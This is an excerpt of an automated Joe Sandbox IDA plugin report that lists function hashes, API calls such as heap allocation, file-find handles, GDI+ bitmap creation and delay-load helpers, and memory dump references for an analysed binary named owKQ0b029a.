                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorFileLast$Create$H_prologPointer
                        • String ID:
                        • API String ID: 3930172495-0
                        • Opcode ID: be2df6da6264735e0ef0aa0c397b13ab5bdb48ce57e609834d90a3ba982a9f49
                        • Instruction ID: f47806c28b6bb19cba45963bc61e66903fccd8c177569a325f7b22e29b8dfd76
                        • Opcode Fuzzy Hash: be2df6da6264735e0ef0aa0c397b13ab5bdb48ce57e609834d90a3ba982a9f49
                        • Instruction Fuzzy Hash: 4C41F5729005559FCB34EF68CC91AFB73B8AF49394F0080ADF86A97255EB709E44DB60
                        APIs
                        • __EH_prolog.LIBCMT ref: 00C80B43
                          • Part of subcall function 00C7C79C: __EH_prolog.LIBCMT ref: 00C7C7A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 05045aa9776fa2b40b62668b82343fcaf69be65a624ac0a3e35b80d1030056f6
                        • Instruction ID: cc1abc1306dac3d6666b5ab14a934e88153b2434b04365ef9c0ec1095382d125
                        • Opcode Fuzzy Hash: 05045aa9776fa2b40b62668b82343fcaf69be65a624ac0a3e35b80d1030056f6
                        • Instruction Fuzzy Hash: 3E012875504380EFDB15AF64EC12FAC7FA4D715314F14805FF40496292DAB21944EB25
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: cf76e61d4a915e5e09786b9c8445d380571a9bfc506c10b7ab3a170953d334b5
                        • Instruction ID: b3ed511b58d656a917dfb098231327189899175f071fe54d1b84216572ce214b
                        • Opcode Fuzzy Hash: cf76e61d4a915e5e09786b9c8445d380571a9bfc506c10b7ab3a170953d334b5
                        • Instruction Fuzzy Hash: D1F049B5A001148FDB18EF6CD40996EB7F8EF88710B1145AEF815D3341EAB09D028BA5
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 1ecf0acad31a95a3f1487e59f7635167619d5847917d32189b187be3eb53cd37
                        • Instruction ID: 146f29d875842ba8e0d27fed98446e8bce39fc746d20bb1c33561c694a2b311c
                        • Opcode Fuzzy Hash: 1ecf0acad31a95a3f1487e59f7635167619d5847917d32189b187be3eb53cd37
                        • Instruction Fuzzy Hash: 74E065315025219BF62137A69C05B5F3648AB523A8F154133AC25961E5DB50CD0257FF
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00C71A7F), ref: 00C71B0E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 12b45b037a1cbe376f4750f4d9e2f69245848d01591bdc72da40753a8b07cc08
                        • Instruction ID: 7c76d9739e978cca4bcbc8b502253eea6c4c3571e63671c0794965d6eb67dbe8
                        • Opcode Fuzzy Hash: 12b45b037a1cbe376f4750f4d9e2f69245848d01591bdc72da40753a8b07cc08
                        • Instruction Fuzzy Hash: F3F089B0552B444FDB308A28D549792B7E49B11731F08D71ED8FA435D0D361954DDF50
                        APIs
                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C7276E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: 23c38f0cfb7ca1eb626ca15908d40d6f816011e822dac7b2fe671a106c8d6915
                        • Instruction ID: 88386e226758fd7961f91f3f87b9576a4f540d3ed162384cba1ae9de14344a8a
                        • Opcode Fuzzy Hash: 23c38f0cfb7ca1eb626ca15908d40d6f816011e822dac7b2fe671a106c8d6915
                        • Instruction Fuzzy Hash: C0F08231408780ABCA225BB58904BCABF905F15371F04CA4DF1FD12196C2755099AB22
                        APIs
                        • GdipAlloc.GDIPLUS(00000010), ref: 00C7DAA1
                          • Part of subcall function 00C7D85A: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7D87B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Gdip$AllocBitmapCreateFromStream
                        • String ID:
                        • API String ID: 1915507550-0
                        • Opcode ID: 73fc65fd507a11d81bb0781ba5467f7cec507a30a4b4418ed8191bf2960411f0
                        • Instruction ID: 2029caadcf2c4fc82bb24223d2c0e42af4a94b604b006798d3c90483468328d9
                        • Opcode Fuzzy Hash: 73fc65fd507a11d81bb0781ba5467f7cec507a30a4b4418ed8191bf2960411f0
                        • Instruction Fuzzy Hash: 71D0A73021420CBBDF41BB71CC02A7A7AA8EF10350F00C029BC0A85281F971DF11B295
                        APIs
                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00C76B3E), ref: 00C80DF8
                          • Part of subcall function 00C7E7E2: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7E7F3
                          • Part of subcall function 00C7E7E2: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7E804
                          • Part of subcall function 00C7E7E2: TranslateMessage.USER32(?), ref: 00C7E80E
                          • Part of subcall function 00C7E7E2: DispatchMessageW.USER32(?), ref: 00C7E818
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Message$DispatchItemPeekSendTranslate
                        • String ID:
                        • API String ID: 4142818094-0
                        • Opcode ID: 7ef2505b9577f85ca14c53f4e289a6139dfdfd197cd668f893da80ac5ee46717
                        • Instruction ID: 17a545ffd53426f2c66371064f7be584e437bc2b13f64a08f1ab528b182fa950
                        • Opcode Fuzzy Hash: 7ef2505b9577f85ca14c53f4e289a6139dfdfd197cd668f893da80ac5ee46717
                        • Instruction Fuzzy Hash: 15D09E32154300BAE6112B51DD06F0E7AAABB88F08F104559B249740F1C6629D31AB01
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81582
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: ff192f3172a9a54adb58251cc26f9998f9398a1c748256722f0d55627802151b
                        • Instruction ID: ab7e5e231eb8af43663440c2d3e0bca90d5032be638e3f3f734bdfa9494fe950
                        • Opcode Fuzzy Hash: ff192f3172a9a54adb58251cc26f9998f9398a1c748256722f0d55627802151b
                        • Instruction Fuzzy Hash: 14B012D5768100AE3904B1555D8BD3703DCC3C0B24738447EFC06C1081D8410C432236
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81582
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: ab09c0b3623c89926cdcc27acac00ae4a728f74f7d988a5c79747953be4e5f54
                        • Instruction ID: 3b0c595ff6ef0b61051fbec0a4e103c0e6f0b15c0ed70fed9965f8823730746a
                        • Opcode Fuzzy Hash: ab09c0b3623c89926cdcc27acac00ae4a728f74f7d988a5c79747953be4e5f54
                        • Instruction Fuzzy Hash: 7EB012C5B58200AE3A04B1556C8BD3603DCC3C0B34339457EF807C1080D8400C832336
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: 5cb41dd5812528ebd68efcb8a2c22301d1258bc200d4e0c4c701f2e2da1881c5
                        • Instruction ID: 1039216afd99bbd7c8dfc2d6f227efe26fd0ac09e705f5ae932ce615e8f138d8
                        • Opcode Fuzzy Hash: 5cb41dd5812528ebd68efcb8a2c22301d1258bc200d4e0c4c701f2e2da1881c5
                        • Instruction Fuzzy Hash: 75B012C1658200BE790471059D4BD3A01DCC3C0F38335413FF802C0080D4510C83123A
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81582
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: 5a3b5dd7f32960a487408f5ca47a070fd0e66976b3c797f4640472021094e521
                        • Instruction ID: 2c80506c50472f1fae4130b9c6fbb3b31488bf654fb3f2d02e23d0fe29e13301
                        • Opcode Fuzzy Hash: 5a3b5dd7f32960a487408f5ca47a070fd0e66976b3c797f4640472021094e521
                        • Instruction Fuzzy Hash: F8B012C6768100BE3D0471615C8BC3603DCD3D0B25338847EF803C008098400C43213A
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: eb5f3a4c57d5fa3ba190a48feaf99f87e1357439dbd0455f828713779ba6037e
                        • Instruction ID: 2dd3097ff523a7a490857403298173600d0cd0387d8c22fe764e910ec41a2db3
                        • Opcode Fuzzy Hash: eb5f3a4c57d5fa3ba190a48feaf99f87e1357439dbd0455f828713779ba6037e
                        • Instruction Fuzzy Hash: 96B012C5658100BE790431219D4BC3A01DCC3C0F38335803EFC02C008195410C43113A
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: 61e1c1e81a3bbdffaf66cda28194204532f8f24d7d80f8dcad2472a306ee0d0e
                        • Instruction ID: 029f93ad0ecbb6fdc8286054c061bc3ab839db245e73844579728b55f7f42462
                        • Opcode Fuzzy Hash: 61e1c1e81a3bbdffaf66cda28194204532f8f24d7d80f8dcad2472a306ee0d0e
                        • Instruction Fuzzy Hash: 27B012C165A100BE7D0471099E4BE3601DCC3C0F3833A403EF802C0080D4C20C43123A
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: 7ab47267bf66aea3b9e6f4ec854a277269fee5343e86bb99b3f6127fd360886f
                        • Instruction ID: 2c5d66ec86616848963f1bfc6e2574feefc8d17f82ae37af9cb9c29586affe31
                        • Opcode Fuzzy Hash: 7ab47267bf66aea3b9e6f4ec854a277269fee5343e86bb99b3f6127fd360886f
                        • Instruction Fuzzy Hash: 48B012C1B58200BE7A047105AD4BD3602DCC3C0F38335413EF802C0080D4510D83223A
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: d74ec28428d8ad100f61bf2a9661c00514ae2d87fd1b5798ce5507b09215815a
                        • Instruction ID: 6e78e9b05d380914dc8e72e96316321657a0dcacbb9897ba329f9d43d045fafc
                        • Opcode Fuzzy Hash: d74ec28428d8ad100f61bf2a9661c00514ae2d87fd1b5798ce5507b09215815a
                        • Instruction Fuzzy Hash: FCB012C1669100BE790472059D4BD3A01DCC7C0F3C339403EF802C0080D4C10C43123B
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81582
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: 16f32654b3f348edaca3621297769759599208e0c7f4c68d4d484f530c7c7624
                        • Instruction ID: b7172d11dc317312aff0324f6b8d5e6da0ecb6698f6694d78492eded0bfe4d40
                        • Opcode Fuzzy Hash: 16f32654b3f348edaca3621297769759599208e0c7f4c68d4d484f530c7c7624
                        • Instruction Fuzzy Hash: 76A002D5559101BD750471515D87D36139DC5D5B657394979F80385081545118471135
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81582
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
